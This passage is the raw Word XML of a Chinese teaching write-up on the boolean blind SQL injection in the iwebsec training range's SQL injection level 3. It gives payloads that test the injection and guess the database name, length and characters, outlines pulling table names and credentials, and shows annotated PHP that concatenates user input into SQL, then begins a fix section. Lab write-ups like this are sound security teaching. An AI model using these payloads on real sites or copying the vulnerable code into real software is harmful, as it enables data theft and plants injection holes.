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2EB43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iwebsec MySQL布尔型SQL注入漏洞分析与修复文档</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C51F469">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="heading_1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>一、漏洞场景概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="03A51818">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="heading_2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>1.1 靶场环境说明</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="3A8E94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本漏洞来自</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iwebsec开源Web安全靶场</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的SQL注入模块第3关（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/sqli/03.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），是典型的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MySQL布尔型SQL盲注（bool SQLi）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 教学场景：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5508B9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注入点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>http://192.168.203.135/sqli/03.php?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268F8F55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页面特征：正常访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>时显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>welcome to iwebsec!!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，条件不成立时页面空白</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684B752D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漏洞类型：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数字型布尔盲注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（无报错、无数据回显，仅通过页面状态判断逻辑真假）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E72FAEE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="heading_3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>1.2漏洞危害</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="6364D46D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攻击者可通过构造逻辑判断语句，逐字符猜解数据库名、表名、字段名、敏感数据（账号密码）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A5D429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可进一步实现数据窃取、权限提升、服务器控制等高危操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23251797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是Web安全领域最经典、最常见的漏洞类型之一，也是CTF比赛、渗透测试的核心考点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC9341D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5208791">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="heading_4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞原理与注入过程分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="32BD611F">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="heading_5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>2.1 核心原理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="17559A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布尔型SQL盲注的本质是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Web应用未对用户输入做过滤，直接将输入拼接到SQL语句中，攻击者通过构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>AND 逻辑判断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>语句，利用页面“正常/异常”两种状态，逐字符暴力猜解数据库信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A73A09">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="heading_6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>2.2 注入过程逐行分析（结合实战）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="362751EA">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="heading_7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.2.1 注入点验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="3E4D57DF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正常访问：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/03.php?id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 页面显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>welcome to iwebsec!!!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（条件为真）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB902EB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构造测试：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/03.php?id=1 AND 1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 页面正常（条件为真，验证注入点存在）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A4B8A1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构造测试：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/03.php?id=1 AND 1=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → 页面空白（条件为假，确认布尔盲注漏洞）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AD6D7B">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="heading_8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.2.2 数据库名长度猜解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1743FEA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AE2D5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测试语句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4DD0C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页面状态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BBE6C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结论</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="45BDECA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47DD5B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?id=1 AND (SELECT LENGTH(DATABASE()))&gt;6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9C811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正常显示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E07EE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数据库名长度 &gt; 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6D1B1BA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CEBBF1">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:shd w:val="clear" w:fill="EFF0F1"/>
              </w:rPr>
              <w:t>?id=1 AND (SELECT LENGTH(DATABASE()))&gt;7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E47DA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页面空白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BFF4C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数据库名长度 ≤ 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6B65D54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B60CF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最终结论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7DE92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-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45F3E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数据库名长度 = 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D830D76">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="heading_9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.2.3 数据库名逐字符猜解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="13941E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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ASCII(SUBSTR())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>函数逐字符猜解，以第1个字符为例：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D1F272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B170FD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AND ASCII(SUBSTR(DATABASE(),1,1))=105</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AC01E59">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto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ASCII=105</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>对应小写字母</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，页面正常显示，确认第1个字符为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6171904E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依次猜解第2-7个字符，最终得到完整数据库名：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>iwebsec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD9A050">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="heading_10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.2.4 表名、字段名、数据猜解（完整流程）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="5BE0DBE9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猜解表名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>INFORMATION_SCHEMA.TABLES</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>系统表，猜解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>iwebsec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>库中的表名（默认表名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C86B9F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猜解字段名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>INFORMATION_SCHEMA.COLUMNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>系统表，猜解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>表的字段（默认字段为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>id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username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password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D8FE20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猜解敏感数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：逐字符猜解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>表中的账号、密码等敏感信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF4B3E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C1040EA">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="heading_11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>三、漏洞源码逐行注释与原理剖析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="29491E43">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="heading_12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>3.1 脆弱源码（模拟还原，教学用）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11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0A065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0BD544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1. 直接获取用户GET参数id，无任何过滤、校验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漏洞根源1：完全信任用户输入，未做输入合法性校验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$id = $_GET['id']; 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2. 直接将用户输入拼接到SQL语句中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漏洞根源2：SQL语句拼接，导致用户输入被数据库解析为指令而非数据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正常执行：SELECT * FROM users WHERE id = 1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注入后执行：SELECT * FROM users WHERE id = 1 AND (SELECT LENGTH(DATABASE()))&gt;6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$sql = "SELECT * FROM users WHERE id = $id";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3. 执行SQL查询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$result = mysqli_query($conn, $sql);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4. 根据查询结果返回页面状态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布尔盲注核心：页面仅返回"查询成功/失败"两种状态，无报错、无数据回显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($row = mysqli_fetch_assoc($result))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// 查询成功（条件为真）：显示正常内容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"welcome to iwebsec!!!";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 else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// 查询失败（条件为假）：页面空白，无任何提示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// 攻击者通过此状态判断逻辑真假，实现盲注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5. 关闭数据库连接（省略）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mysqli_close($conn);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383A33FF">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="heading_13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>3.2 漏洞核心成因总结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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7BA346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CBF5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成因类型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B579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具体说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="017C0D3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B4E26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输入未校验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648C5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直接接收用户输入，未做类型校验、长度校验、白名单校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1FB6D9F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1AAA3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SQL语句拼接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05980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未使用预处理语句，直接将用户输入拼接到SQL中，导致指令与数据混淆</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1A9DC7D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B4BB1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错误信息隐藏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E228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页面无SQL报错信息，仅返回状态，符合布尔盲注的触发条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="57C1D60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4FB03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数据库权限过高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DF5A0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Web应用使用的数据库用户拥有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INFORMATION_SCHEMA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>访问权限，可被猜解系统表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39BEB12E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C2E3344">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="heading_14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>四、漏洞修复方案（生产环境+教学场景双版本）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="524B6CBD">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="heading_15"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>4.1 修复核心原则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="5E2BB0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唯一黄金法则：分离数据与SQL指令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，从根本上避免用户输入被数据库解析为SQL指令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677983C9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6961E81">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="heading_16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>4.2 方案一：预处理语句（Prepared Statements）—— 生产环境标准方案</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="094AA2AD">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="heading_17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
